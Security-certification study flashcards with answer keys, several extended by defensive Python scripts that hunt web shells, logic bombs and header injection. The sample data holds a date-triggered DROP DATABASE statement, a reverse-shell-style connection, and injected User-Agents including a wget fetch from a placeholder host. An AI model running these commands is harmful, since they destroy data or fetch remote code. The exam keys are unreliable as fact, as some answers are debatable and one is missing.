Study Guide 301-400 Flashcards

(100 cards)

1
Q

A security officer is implementing a security awareness program and has placed security-themed posters around the building and assigned online user training. Which of the following will the security officer most likely implement?

A. Password policy
B. Access badges
C. Phishing campaign
D. Risk assessment
A

C. Phishing campaign

2
Q

A malicious update was distributed to a common software platform and disabled services at many organizations. Which of the following best describes this type of vulnerability?

A. DDoS attack
B. Rogue employee
C. Insider threat
D. Supply chain
A

D. Supply chain

3
Q

A company web server is initiating outbound traffic to a low-reputation, public IP on a non-standard port. The web server is used to present an unauthenticated page to clients who upload images to the company. An analyst notices a suspicious process running on the server that was not created by the company development team. Which of the following is the most likely explanation for this security incident?

A. A web shell has been deployed to the server through the page.
B. A vulnerability has been exploited to deploy a worm to the server.
C. Malicious insiders are using the server to mine cryptocurrency.
D. Attackers have deployed a rootkit Trojan to the server over an exposed RDP port.
A

A. A web shell has been deployed to the server through the page
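The two indicators in this card (a process the development team did not create, and the web server reaching out to a low-reputation address on a non-standard port) are what a hunt for web-shell activity correlates. The script below is an added example, not code from the original page: it walks a process tree and a socket table and flags interpreters spawned under the web server worker, and outbound connections to unusual ports or listed addresses. All process and connection records, the web-server names, the egress allowlist and the threat-intel list are constructed assumptions; in practice they come from ps/lsof, /proc or an EDR export.

```python
"""Hunt for web-shell behaviour on a web server.

Added example, not code from the original page. Indicators mirror the card:
an interpreter or shell spawned under the web server worker, and an outbound
connection to a low-reputation address on a non-standard port. All process
and socket data below is constructed; in practice it comes from ps/lsof,
/proc, or an EDR export. Names and allowlists are assumptions."""
from dataclasses import dataclass

WEB_SERVER_NAMES = {"nginx", "apache2", "httpd", "php-fpm"}    # assumed web tier
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python3", "perl", "nc", "ncat", "socat", "curl", "wget"}
NORMAL_OUTBOUND_PORTS = {80, 443, 53}        # assumed legitimate egress for the image-upload site
LOW_REPUTATION_IPS = {"203.0.113.77"}        # constructed threat-intel feed (TEST-NET-3 range)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str
    user: str
    cmdline: str


@dataclass(frozen=True)
class Conn:
    pid: int
    raddr: str
    rport: int
    state: str


def ancestors(pid, by_pid):
    """Walk the parent chain from pid towards init, guarding against loops."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid].ppid


def under_web_server(proc, by_pid):
    """True if any ancestor of proc is a web server process (master or worker)."""
    return any(a.name in WEB_SERVER_NAMES for a in ancestors(proc.ppid, by_pid))


def hunt(procs, conns):
    """Return [(pid, [reasons])] for processes that look like web-shell activity."""
    by_pid = {p.pid: p for p in procs}
    conns_by_pid = {}
    for c in conns:
        conns_by_pid.setdefault(c.pid, []).append(c)

    findings = []
    for p in procs:
        # Web server processes themselves are expected; only their descendants matter.
        if p.name in WEB_SERVER_NAMES or not under_web_server(p, by_pid):
            continue
        reasons = []
        if p.name in INTERPRETERS:
            reasons.append(f"'{p.name}' spawned under the web server as {p.user}")
        for c in conns_by_pid.get(p.pid, []):
            if c.state != "ESTABLISHED":
                continue
            if c.rport not in NORMAL_OUTBOUND_PORTS:
                reasons.append(f"outbound {c.raddr}:{c.rport} on a non-standard port")
            if c.raddr in LOW_REPUTATION_IPS:
                reasons.append(f"peer {c.raddr} is on the low-reputation list")
        if reasons:
            findings.append((p.pid, reasons))
    return findings


# Constructed snapshot: an nginx + php-fpm host where the upload page has been abused.
SAMPLE_PROCS = [
    Proc(1, 0, "systemd", "root", "/sbin/init"),
    Proc(800, 1, "nginx", "root", "nginx: master process"),
    Proc(801, 800, "nginx", "www-data", "nginx: worker process"),
    Proc(900, 1, "php-fpm", "root", "php-fpm: master process"),
    Proc(901, 900, "php-fpm", "www-data", "php-fpm: pool www"),
    Proc(1337, 901, "sh", "www-data", "sh -c /tmp/.cache/update"),   # spawned by a PHP request handler
    Proc(1338, 1337, "bash", "www-data", "bash -i"),
    Proc(2000, 1, "sshd", "root", "/usr/sbin/sshd -D"),
]
SAMPLE_CONNS = [
    Conn(801, "198.51.100.20", 443, "ESTABLISHED"),     # worker calling an upstream API: expected
    Conn(1338, "203.0.113.77", 4444, "ESTABLISHED"),    # shell calling home
    Conn(2000, "192.0.2.10", 50222, "ESTABLISHED"),     # admin SSH session; not under the web tier
]

if __name__ == "__main__":
    for pid, reasons in hunt(SAMPLE_PROCS, SAMPLE_CONNS):
        print(pid, *reasons, sep="\n  ")
```

The parent-chain check is what separates a web shell from the other options on the card: a worm or an RDP-delivered rootkit would not normally sit under php-fpm running as www-data, and cryptomining would show sustained CPU rather than an interactive shell calling out on 4444.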

4
Q

An organization requests a third-party full-spectrum analysis of its supply chain. Which of the following would the analysis team use to meet this requirement?

A. Vulnerability scanner
B. Penetration test
C. SCAP
D. Illumination tool
A

D. Illumination tool

5
Q

A systems administrator deployed a monitoring solution that does not require installation on the endpoints that the solution is monitoring. Which of the following is described in this scenario?

A. Agentless solution
B. Client-based solution
C. Open port
D. File-based solution
A

A. Agentless solution

6
Q

A security analyst is reviewing the source code of an application in order to identify misconfigurations and vulnerabilities. Which of the following kinds of analysis best describes this review?

A. Dynamic
B. Static
C. Gap
D. Impact
A

B. Static

7
Q

Which of the following agreement types is used to limit external discussions?

A. BPA
B. NDA
C. SLA
D. MSA
A

B. NDA

8
Q

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the SaaS vendor. Which of the following processes is the analyst most likely conducting?

A. Internal audit
B. Penetration testing
C. Attestation
D. Due diligence
A

D. Due diligence

9
Q

Which of the following is used to conceal credit card information in a database log file?

A. Tokenization
B. Masking
C. Hashing
D. Obfuscation
A

B. Masking

10
Q

A systems administrator is configuring a site-to-site VPN between two branch offices. Some of the settings have already been configured correctly. The systems administrator has been provided the following requirements as part of completing the configuration:

  • Most secure algorithms should be selected
  • All traffic should be encrypted over the VPN
  • A secret password will be used to authenticate the two VPN concentrators

Click on the two VPN Concentrators to configure the appropriate settings.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Refer to picture

A

Refer to picture

11
Q

An organization recently started hosting a new service that customers access through a web portal. A security engineer needs to add to the existing security devices a new solution to protect this new service. Which of the following is the engineer most likely to deploy?

A. Layer 4 firewall
B. NGFW
C. WAF
D. UTM
A

C. WAF

12
Q

Which of the following topics would most likely be included within an organization’s SDLC?

A. Service-level agreements
B. Information security policy
C. Penetration testing methodology
D. Branch protection requirements
A

D. Branch protection requirements

13
Q

Which of the following control types is AUP an example of?

A. Physical
B. Managerial
C. Technical
D. Operational
A

B. Managerial

14
Q

An organization is adopting cloud services at a rapid pace and now has multiple SaaS applications in use. Each application has a separate log-in, so the security team wants to reduce the number of credentials each employee must maintain. Which of the following is the first step the security team should take?

A. Enable SAML.
B. Create OAuth tokens.
C. Use password vaulting.
D. Select an IdP.
A

D. Select an IdP

15
Q

A company’s online shopping website became unusable shortly after midnight on January 30, 2023. When a security analyst reviewed the database server, the analyst noticed the following code used for backing up data:

IF DATE() = "01/30/2023" THEN BEGIN DROP DATABASE WebShopOnline; END

Which of the following should the analyst do next?

A. Check for recently terminated DBAs.
B. Review WAF logs for evidence of command injection.
C. Scan the database server for malware.
D. Search the web server for ransomware notes.
A

A. Check for recently terminated DBAs
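The statement on this card is a logic bomb: a destructive action guarded by a date check, hidden inside a job that is supposed to back data up. The code tells the analyst what happened; who planted it comes from HR and access records, which is why the card's next step is to check for recently terminated DBAs. Before that conversation, an analyst would want to know whether other jobs carry the same pattern. The scanner below is an added example, not code from the original page: it searches job and procedure text for destructive statements and reports those sitting inside a date-conditional block as high severity. The job definitions are constructed (the first one embeds the card's own statement), and the lists of date functions and destructive keywords are the author's assumptions to be extended for the engine in use.

```python
"""Hunt scheduled jobs and stored procedures for date-triggered destructive
statements, i.e. the logic-bomb pattern shown on this card.

Added example, not from the original page. The job texts are constructed;
the first one embeds the card's own statement. The pattern names used for
date functions and destructive statements are the author's assumptions and
should be extended for the database engine in use."""
import re

DATE_FUNCS = r"(?:DATE|GETDATE|CURRENT_DATE|CURRENT_TIMESTAMP|NOW|SYSDATE|CURDATE|DAY|MONTH|YEAR)\s*\("
# IF <condition containing a date/time function and a comparison> THEN
DATE_GUARD = re.compile(
    r"\bIF\s+(?P<cond>[^\n]*?" + DATE_FUNCS + r"[^\n]*?(?:=|>=|<=|>|<|LIKE)[^\n]*?)\s+THEN\b",
    re.IGNORECASE,
)
# Statements that destroy data outright; DELETE counts only when it has no WHERE clause.
DESTRUCTIVE = re.compile(
    r"\b(?:DROP\s+(?:DATABASE|TABLE|SCHEMA)|TRUNCATE\s+TABLE|DELETE\s+FROM(?![^\n;]*\bWHERE\b)|xp_cmdshell|SHUTDOWN)\b",
    re.IGNORECASE,
)
BLOCK_END = re.compile(r"\bEND\b", re.IGNORECASE)


def guarded_spans(sql):
    """(start, end, condition) for the body of each date-guarded block."""
    spans = []
    for m in DATE_GUARD.finditer(sql):
        end = BLOCK_END.search(sql, m.end())
        spans.append((m.end(), end.start() if end else len(sql), m.group("cond").strip()))
    return spans


def scan_job(name, sql):
    """Every destructive statement in one job, tagged with the date guard (if any) around it."""
    findings = []
    spans = guarded_spans(sql)
    for d in DESTRUCTIVE.finditer(sql):
        guard = next((cond for s, e, cond in spans if s <= d.start() < e), None)
        findings.append({
            "job": name,
            "statement": " ".join(d.group(0).split()),
            "guard": guard,
            "severity": "high" if guard else "medium",   # unguarded destructive SQL still deserves a look
        })
    return findings


def scan_jobs(jobs):
    """Scan a {job_name: sql_text} mapping; high-severity findings sort first."""
    findings = []
    for name, sql in jobs.items():
        findings.extend(scan_job(name, sql))
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["job"]))


SAMPLE_JOBS = {   # constructed job definitions
    "nightly_backup": (
        "BACKUP DATABASE WebShopOnline TO DISK = '/backups/webshop.bak';\n"
        'IF DATE() = "01/30/2023" THEN BEGIN DROP DATABASE WebShopOnline; END'
    ),
    "purge_sessions": "DELETE FROM sessions WHERE expires_at < NOW();",
    "archive_orders": (
        "IF MONTH(NOW()) = 1 THEN BEGIN "
        "INSERT INTO orders_archive SELECT * FROM orders WHERE created < '2022-01-01'; END"
    ),
    "cleanup_tmp": "TRUNCATE TABLE tmp_import;",
}

if __name__ == "__main__":
    for f in scan_jobs(SAMPLE_JOBS):
        print(f"[{f['severity']}] {f['job']}: {f['statement']}  guard={f['guard']}")
```

The date-guarded archive job is deliberately not flagged: a date condition alone is normal in scheduling, and a DELETE with a WHERE clause is routine housekeeping. Only the combination of a date trigger with an unconditional destructive statement matches the card's scenario.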

16
Q

Which of the following would be the best way to test resiliency in the event of a primary power failure?

A. Parallel processing
B. Tabletop exercise
C. Simulation testing
D. Production failover
A

D. Production failover

17
Q

Which of the following would be the most appropriate way to protect data in transit?

A. SHA-256
B. SSL3.0
C. TLS 1.3
D. AES-256
A

C. TLS 1.3

18
Q

Which of the following is a common, passive reconnaissance technique employed by penetration testers in the early phases of an engagement?

A. Open-source intelligence
B. Port scanning
C. Pivoting
D. Exploit validation
A

A. Open-source intelligence

19
Q

Which of the following threat actors is the most likely to seek financial gain through the use of ransomware attacks?

A. Organized crime
B. Insider threat
C. Nation-state
D. Hacktivists
A

A. Organized crime

20
Q

Which of the following would a systems administrator follow when upgrading the firmware of an organization’s router?

A. Software development life cycle
B. Risk tolerance
C. Certificate signing request
D. Maintenance window
A

D. Maintenance window

21
Q

The security team has been asked to only enable host A (10.2.2.7) and host B (10.3.9.9) to the new isolated network segment (10.9.8.14) that provides access to legacy devices.
Access from all other hosts should be blocked. Which of the following entries would need to be added on the firewall?

A. Permit 10.2.2.0/24 to 10.9.8.14/27
   Permit 10.3.9.0/24 to 10.9.8.14/27
   Deny 0.0.0.0/0 to 10.9.8.14/27

B. Deny 0.0.0.0/0 to 10.9.8.14/27
   Permit 10.2.2.0/24 to 10.9.8.14/27
   Permit 10.3.9.0/24 to 10.9.8.14/27

C. Permit 10.2.2.7/32 to 10.9.8.14/27
   Permit 10.3.9.9/32 to 10.9.8.14/27
   Deny 0.0.0.0/0 to 10.9.8.14/27

D. Permit 10.2.2.7/32 to 10.9.8.14/27
   Permit 10.3.9.0/24 to 10.9.8.14/27
   Deny 10.9.8.14/27 to 0.0.0.0/0

A

C. Permit 10.2.2.7/32 to 10.9.8.14/27
Permit 10.3.9.9/32 to 10.9.8.14/27
Deny 0.0.0.0/0 to 10.9.8.14/27
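Why C is the only correct answer is easiest to see by running the four rule sets through a first-match evaluator. The script below is an added example, not code from the original page; it parses the rules as the card writes them, probes each with host A, host B and three other sources, and also reports rules that can never match because an earlier rule already covers them (the problem with option B). The legacy device address 10.9.8.20 and the extra probe hosts are constructed; the firewall's implicit default action is assumed to be deny and is reported as None rather than guessed.

```python
"""Evaluate the four candidate rule sets from the firewall card with
first-match semantics.

Added example, not from the original page. Rules are parsed from the text
exactly as the card writes them ("<action> <src> to <dst>"). Probe hosts
other than 10.2.2.7 and 10.3.9.9, and the legacy device address, are
constructed."""
import ipaddress


class Rule:
    def __init__(self, action, src, dst):
        self.action = action.lower()
        # strict=False: "10.9.8.14/27" is a host address inside 10.9.8.0/27,
        # which is how the card writes the segment
        self.src = ipaddress.ip_network(src, strict=False)
        self.dst = ipaddress.ip_network(dst, strict=False)

    def matches(self, src, dst):
        return src in self.src and dst in self.dst


def parse(text):
    rules = []
    for line in text.strip().splitlines():
        action, src, _to, dst = line.split()
        rules.append(Rule(action, src, dst))
    return rules


def evaluate(rules, src, dst):
    """First matching rule wins. None means no explicit rule matched and the
    firewall's default (normally deny) would apply."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for rule in rules:
        if rule.matches(s, d):
            return rule.action
    return None


def shadowed(rules):
    """Indexes of rules that can never match because an earlier rule covers them."""
    out = []
    for i, rule in enumerate(rules):
        for earlier in rules[:i]:
            if rule.src.subnet_of(earlier.src) and rule.dst.subnet_of(earlier.dst):
                out.append(i)
                break
    return out


OPTIONS = {
    "A": "Permit 10.2.2.0/24 to 10.9.8.14/27\nPermit 10.3.9.0/24 to 10.9.8.14/27\nDeny 0.0.0.0/0 to 10.9.8.14/27",
    "B": "Deny 0.0.0.0/0 to 10.9.8.14/27\nPermit 10.2.2.0/24 to 10.9.8.14/27\nPermit 10.3.9.0/24 to 10.9.8.14/27",
    "C": "Permit 10.2.2.7/32 to 10.9.8.14/27\nPermit 10.3.9.9/32 to 10.9.8.14/27\nDeny 0.0.0.0/0 to 10.9.8.14/27",
    "D": "Permit 10.2.2.7/32 to 10.9.8.14/27\nPermit 10.3.9.0/24 to 10.9.8.14/27\nDeny 10.9.8.14/27 to 0.0.0.0/0",
}

LEGACY_DEVICE = "10.9.8.20"          # constructed address inside 10.9.8.0/27
PROBES = {                           # source host -> verdict the requirement demands
    "10.2.2.7": "permit",            # host A
    "10.3.9.9": "permit",            # host B
    "10.2.2.50": "deny",             # neighbour of A on the same /24 (constructed)
    "10.3.9.10": "deny",             # neighbour of B on the same /24 (constructed)
    "172.16.4.4": "deny",            # unrelated internal host (constructed)
}


def check_option(text):
    """(verdict per probe host, True if the rule set meets the requirement)."""
    rules = parse(text)
    verdicts = {host: evaluate(rules, host, LEGACY_DEVICE) for host in PROBES}
    return verdicts, all(verdicts[h] == want for h, want in PROBES.items())


if __name__ == "__main__":
    for letter, text in OPTIONS.items():
        verdicts, ok = check_option(text)
        print(letter, "PASS" if ok else "FAIL", verdicts, "shadowed:", shadowed(parse(text)))
```

Option A permits whole /24s, option B's deny-any shadows both permits so nothing reaches the segment, and option D's deny is written in the wrong direction (segment to anywhere) so other hosts fall through to the implicit default instead of being explicitly blocked.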

22
Q

A security analyst is creating the first draft of a network diagram for the company’s new customer-facing payment application that will be hosted by a third-party cloud service provider.

Click the ? to select the appropriate icons to create a secure, redundant web application. Then use the dropdown menu to select the appropriate subnet type. Every space in the diagram must be filled.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A

Refer to picture

23
Q

A systems administrator needs to ensure the secure communication of sensitive data within the organization’s private cloud. Which of the following is the best choice for the administrator to implement?

A. IPSec
B. SHA-1
C. RSA
D. TGT
A

A. IPSec

24
Q

Which of the following should an internal auditor check for first when conducting an audit of the organization’s risk management program?

A. Policies and procedures
B. Asset management
C. Vulnerability assessment
D. Business impact analysis
A

A. Policies and procedures

25
Q

Which of the following activities are associated with vulnerability management? (Choose two.)

A. Reporting
B. Prioritization
C. Exploiting
D. Correlation
E. Containment
F. Tabletop exercise
A

A. Reporting
B. Prioritization

26
Q

An administrator wants to perform a risk assessment without using proprietary company information. Which of the following methods should the administrator use to gather information?

A. Network scanning
B. Penetration testing
C. Open-source intelligence
D. Configuration auditing
A

C. Open-source intelligence

27
Q

A systems administrator is concerned about vulnerabilities within cloud computing instances. Which of the following is most important for the administrator to consider when architecting a cloud computing environment?

A. SQL injection
B. TOC/TOU
C. VM escape
D. Tokenization
E. Password spraying
A

C. VM escape

28
Q

A database administrator is updating the company’s SQL database, which stores credit card information for pending purchases. Which of the following is the best method to secure the data against a potential breach?

A. Hashing
B. Obfuscation
C. Tokenization
D. Masking
A

C. Tokenization

29
Q

Which of the following is a benefit of vendor diversity?

A. Patch availability
B. Zero-day resiliency
C. Secure configuration guide applicability
D. Load balancing
A

B. Zero-day resiliency

30
Q

An employee used a company’s billing system to issue fraudulent checks. The administrator is looking for evidence of other occurrences of this activity. Which of the following should the administrator examine?

A. Application logs
B. Vulnerability scanner logs
C. IDS/IPS logs
D. Firewall logs
A

A. Application logs

31
Q

An organization is looking to optimize its environment and reduce the number of patches necessary for operating systems. Which of the following will best help to achieve this objective?

A. Microservices
B. Virtualization
C. Real-time operating system
D. Containers
A

D. Containers

32
Q

Which of the following tasks is typically included in the BIA process?

A. Estimating the recovery time of systems
B. Identifying the communication strategy
C. Evaluating the risk management plan
D. Establishing the backup and recovery procedures
E. Developing the incident response plan
A

A. Estimating the recovery time of systems

33
Q

Which of the following is a risk of conducting a vulnerability assessment?

A. A disruption of business operations
B. Unauthorized access to the system
C. Reports of false positives
D. Finding security gaps in the system
A

A. A disruption of business operations

34
Q

Which of the following techniques would attract the attention of a malicious attacker in an insider threat scenario?

A. Creating a false text file in /docs/salaries
B. Setting weak passwords in /etc/shadow
C. Scheduling vulnerable jobs in /etc/crontab
D. Adding a fake account to /etc/passwd
A

A. Creating a false text file in /docs/salaries

35
Q

An organization maintains intellectual property that it wants to protect. Which of the following concepts would be most beneficial to add to the company’s security awareness training program?

A. Insider threat detection
B. Simulated threats
C. Phishing awareness
D. Business continuity planning
A

A. Insider threat detection

36
Q

An organization plans to expand its operations internationally and needs to keep data at the new location secure. The organization wants to use the most secure architecture model possible. Which of the following models offers the highest level of security?

A. Cloud-based
B. Peer-to-peer
C. On-premises
D. Hybrid
A

C. On-premises

37
Q

Which of the following is the most relevant reason a DPO would develop a data inventory?

A. To manage data storage requirements better
B. To determine the impact in the event of a breach
C. To extend the length of time data can be retained
D. To automate the reduction of duplicated data
A

B. To determine the impact in the event of a breach

38
Q

Which of the following cryptographic solutions protects data at rest?

A. Digital signatures
B. Full disk encryption
C. Private key
D. Steganography
A

B. Full disk encryption

39
Q

Which of the following should an organization use to protect its environment from external attacks conducted by an unauthorized hacker?

A. ACL
B. IDS
C. HIDS
D. NIPS
A

D. NIPS

40
Q

Which of the following would enable a data center to remain operational through a multiday power outage?

A. Generator
B. Uninterruptible power supply
C. Replication
D. Parallel processing
A

A. Generator

41
Q

A company installed cameras and added signs to alert visitors that they are being recorded. Which of the following controls did the company implement? (Choose two.)

A. Directive
B. Deterrent
C. Preventive
D. Detective
E. Corrective
F. Technical
A

B. Deterrent
D. Detective

42
Q

Which of the following is the best way to securely store an encryption key for a data set in a manner that allows multiple entities to access the key when needed?

A. Public key infrastructure
B. Open public ledger
C. Public key encryption
D. Key escrow
A

D. Key escrow

43
Q

For which of the following reasons would a systems administrator leverage a 3DES hash from an installer file that is posted on a vendor’s website?

A. To test the integrity of the file
B. To validate the authenticity of the file
C. To activate the license for the file
D. To calculate the checksum of the file
A

A. To test the integrity of the file

44
Q

A company is redesigning its infrastructure and wants to reduce the number of physical servers in use. Which of the following architectures is best suited for this goal?

A. Isolation
B. Segmentation
C. Virtualization
D. Redundancy
A

C. Virtualization

45
Q

Which of the following security concepts is being followed when implementing a product that offers protection against DDoS attacks?

A. Availability
B. Non-repudiation
C. Integrity
D. Confidentiality
A

A. Availability

46
Q

A security manager created new documentation to use in response to various types of security incidents. Which of the following is the next step the manager should take?

A. Set the maximum data retention policy.
B. Securely store the documents on an air-gapped network.
C. Review the documents’ data classification policy.
D. Conduct a tabletop exercise with the team.

47
Q

After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following causes this action?

A. Non-compliance
B. Contract violations
C. Government sanctions
D. Rules of engagement
A

A. Non-compliance

48
Q

A company is developing a critical system for the government and storing project information on a fileshare. Which of the following describes how this data will most likely be classified? (Choose two.)

A. Private
B. Confidential
C. Public
D. Operational
E. Urgent
F. Restricted
A

B. Confidential
F. Restricted

49
Q

Which of the following activities is included in the post-incident review phase?

A. Determining the root cause of the incident
B. Developing steps to mitigate the risks of the incident
C. Validating the accuracy of the evidence collected during the investigation
D. Reestablishing the compromised system’s configuration and settings
A

A. Determining the root cause of the incident

50
Q

Which of the following attacks exploits a potential vulnerability as a result of using weak cryptographic algorithms?

A. Password cracking
B. On-path
C. Digital signing
D. Side-channel
A

A. Password cracking

51
Q

Which of the following is a preventive physical security control?

A. Video surveillance system
B. Bollards
C. Alarm system
D. Motion sensors
A

B. Bollards

52
Q

Which of the following is most likely to be used as a just-in-time reference document within a security operations center?

A. Change management policy
B. Risk profile
C. Playbook
D. SIEM profile
A

C. Playbook

53
Q

A security engineer configured a remote access VPN. The remote access VPN allows end users to connect to the network by using an agent that is installed on the endpoint, which establishes an encrypted tunnel. Which of the following protocols did the engineer most likely implement?

A. GRE
B. IPSec
C. SD-WAN
D. EAP
A

B. IPSec

54
Q

Executives at a company are concerned about employees accessing systems and information about sensitive company projects unrelated to the employees’ normal job duties. Which of the following enterprise security capabilities will the security team most likely deploy to detect that activity?

A. UBA
B. EDR
C. NAC
D. DLP
A

A. UBA

55
Q

Several customers want an organization to verify its security controls are operating effectively and have requested an independent opinion. Which of the following is the most efficient way to address these requests?

A. Hire a vendor to perform a penetration test.
B. Perform an annual self-assessment.
C. Allow each client the right to audit.
D. Provide a third-party attestation report.
A

D. Provide a third-party attestation report.

56
Q

A university employee logged on to the academic server and attempted to guess the system administrators’ log-in credentials. Which of the following security measures should the university have implemented to detect the employee’s attempts to gain access to the administrators’ accounts?

A. Two-factor authentication
B. Firewall
C. Intrusion prevention system
D. User activity logs
A

D. User activity logs

57
Q

Which of the following consequences would a retail chain most likely face from customers in the event the retailer is non-compliant with PCI DSS?

A. Contractual impacts
B. Sanctions
C. Fines
D. Reputational damage
A

D. Reputational damage

58
Q

A security analyst is reviewing logs and discovers the following:

149.32.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/ id} 200 397

Which of the following should be used to best mitigate this type of attack?

A. Input sanitization
B. Secure cookies
C. Static code analysis
D. Sandboxing
A

A. Input sanitization

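The User-Agent in this log entry is attacker-controlled input carrying an expression that the application, or a logging or templating layer behind it, might evaluate. Two things follow for a practitioner: detect such attempts in existing logs, and sanitize header values before they reach anything that interprets them. The script below is an added example, not code from the original page. The first sample log line reproduces the card's entry (with its request field tidied); the other three lines are constructed, as is the layout assumption that the access log carries IP, timestamp, request, User-Agent, status and bytes in that order.

```python
"""Detect shell/expression injection attempts in web access logs, and
sanitise header values before they are logged or interpolated.

Added example, not from the original page. The first sample line reproduces
the card's log entry; the others are constructed. The log layout
(IP, timestamp, request, User-Agent, status, bytes) follows the card."""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?\[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'User-Agent: (?P<ua>.*) (?P<status>\d{3}) (?P<bytes>\d+|-)$'
)

# Each pattern names one injection idiom seen in header values.
SUSPICIOUS = [
    ("expression-lookup", re.compile(r"\$\{[^}]*\}")),                 # ${...} lookups
    ("shell-substitution", re.compile(r"\$\([^)]*\)|`[^`]*`")),        # $(cmd) or `cmd`
    ("interpreter-path", re.compile(r"/bin/(?:ba|da|z)?sh\b|/usr/bin/(?:python|perl)", re.I)),
    ("command-chain", re.compile(r"[;|&]{1,2}\s*(?:id|whoami|cat|wget|curl|nc)\b", re.I)),
]


def classify(value):
    """Names of the injection idioms present in a header value (empty if clean)."""
    return [name for name, pat in SUSPICIOUS if pat.search(value)]


def scan_log(text):
    """Parse each line and return the flagged ones with their indicators."""
    flagged = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m.group("ua"))
        if hits:
            flagged.append({"ip": m.group("ip"), "ua": m.group("ua"), "hits": hits})
    return flagged


def sanitize_header(value, max_len=256):
    """Mitigation side: keep printable ASCII only, cap the length, and neutralise
    the tokens that turn a header into an expression or a command."""
    cleaned = "".join(ch for ch in value if 0x20 <= ord(ch) < 0x7F)[:max_len]
    for token, encoded in (("${", "%24%7B"), ("$(", "%24%28"), ("`", "%60")):
        cleaned = cleaned.replace(token, encoded)
    return cleaned


SAMPLE_LOG = """\
149.32.228.10 - - [28/Jan/2023:16:32:45 -0300] "GET / HTTP/1.0" User-Agent: ${/bin/sh/ id} 200 397
198.51.100.7 - - [28/Jan/2023:16:33:02 -0300] "GET /index.html HTTP/1.1" User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/109.0 200 5120
203.0.113.9 - - [28/Jan/2023:16:35:10 -0300] "GET /login HTTP/1.1" User-Agent: curl/7.88.1 $(id) 200 397
192.0.2.44 - - [28/Jan/2023:16:36:41 -0300] "POST /upload HTTP/1.1" User-Agent: Mozilla/5.0; wget http://203.0.113.9/x 200 120
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["hits"], "->", sanitize_header(f["ua"]))
```

Sanitization has to happen where the value is consumed (the request handler, the log formatter, the template engine), not only at a WAF in front; the detection patterns are a hunting aid for logs already written and will need tuning, since a legitimate User-Agent can contain semicolons.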
59
Q

An administrator is installing an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key. Which of the following should the administrator check for next?

A. If the wildcard certificate is configured
B. If the certificate signing request is valid
C. If the root certificate is installed
D. If the public key is configured
A

C. If the root certificate is installed

60
Q

An employee emailed a new systems administrator a malicious web link and convinced the administrator to change the email server’s password. The employee used this access to remove the mailboxes of key personnel. Which of the following security awareness concepts would help prevent this threat in the future?

A. Recognizing phishing
B. Providing situational awareness training
C. Using password management
D. Reviewing email policies
A

A. Recognizing phishing

61
Q

Which of the following strategies should an organization use to efficiently manage and analyze multiple types of logs?

A. Deploy a SIEM solution.
B. Create custom scripts to aggregate and analyze logs.
C. Implement EDR technology.
D. Install a unified threat management appliance.
A

A. Deploy a SIEM solution.

62
Q

A new security regulation was announced that will take effect in the coming year. A company must comply with it to remain in business. Which of the following activities should the company perform next?

A. Gap analysis
B. Policy review
C. Security procedure evaluation
D. Threat scope reduction
A

A. Gap analysis

63
Q

An accountant is transferring information to a bank over FTP. Which of the following mitigations should the accountant use to protect the confidentiality of the data?

A. Tokenization
B. Data masking
C. Encryption
D. Obfuscation
A

C. Encryption

64
Q

An organization has recently decided to implement SSO. The requirements are to leverage access tokens and focus on application authorization rather than user authentication. Which of the following solutions would the engineering team most likely configure?

A. LDAP
B. Federation
C. SAML
D. OAuth
A

D. OAuth

65
Q

Which of the following would most likely be used by attackers to perform credential harvesting?

A. Social engineering
B. Supply chain compromise
C. Third-party software
D. Rainbow table
A

A. Social engineering

66
Q

A security engineer would like to enhance the use of automation and orchestration within the SIEM. Which of the following would be the primary benefit of this enhancement?

A. It increases complexity.
B. It removes technical debt.
C. It adds additional guard rails.
D. It acts as a workforce multiplier.
A

D. It acts as a workforce multiplier.

67
Q

A systems administrator receives an alert that a company’s internal file server is very slow and is only working intermittently. The systems administrator reviews the server management software and finds the following information about the server:

Refer to picture

Which of the following indicators most likely triggered this alert?

A. Concurrent session usage
B. Network saturation
C. Account lockout
D. Resource consumption
A

D. Resource consumption

68
Q

Which of the following data states applies to data that is being actively processed by a database server?

A. In use
B. At rest
C. In transit
D. Being hashed
A

A. In use

69
Q

Which of the following architectures is most suitable to provide redundancy for critical business processes?

A. Network-enabled
B. Server-side
C. Cloud-native
D. Multitenant
A

C. Cloud-native

70
Q

After a security incident, a systems administrator asks the company to buy a NAC platform. Which of the following attack surfaces is the systems administrator trying to protect?

A. Bluetooth
B. Wired
C. NFC
D. SCADA
A

B. Wired

71
Q

While reviewing logs, a security administrator identifies the following code:

Refer to picture

Which of the following best describes the vulnerability being exploited?

A. XSS
B. SQLi
C. DDoS
D. CSRF
A

A. XSS

72
Q

An organization issued new laptops to all employees and wants to provide web filtering both in and out of the office without configuring additional access to the network. Which of the following types of web filtering should a systems administrator configure?

A. Agent-based
B. Centralized proxy
C. URL scanning
D. Content categorization
A

A. Agent-based

73
Q

Which of the following provides the best protection against unwanted or insecure communications to and from a device?

A. System hardening
B. Host-based firewall
C. Intrusion detection system
D. Anti-malware software
A

B. Host-based firewall

74
Q

Which of the following should be used to aggregate log data in order to create alerts and detect anomalous activity?

A. SIEM
B. WAF
C. Network taps
D. IDS
A

A. SIEM

75
Q

Which of the following is the primary purpose of a service that tracks log-ins and time spent using the service?

A. Availability
B. Accounting
C. Authentication
D. Authorization
A

B. Accounting

76
Q

An employee who was working remotely lost a mobile device containing company data. Which of the following provides the best solution to prevent future data loss?

A. MDM
B. DLP
C. FDE
D. EDR
A

A. MDM

77
Q

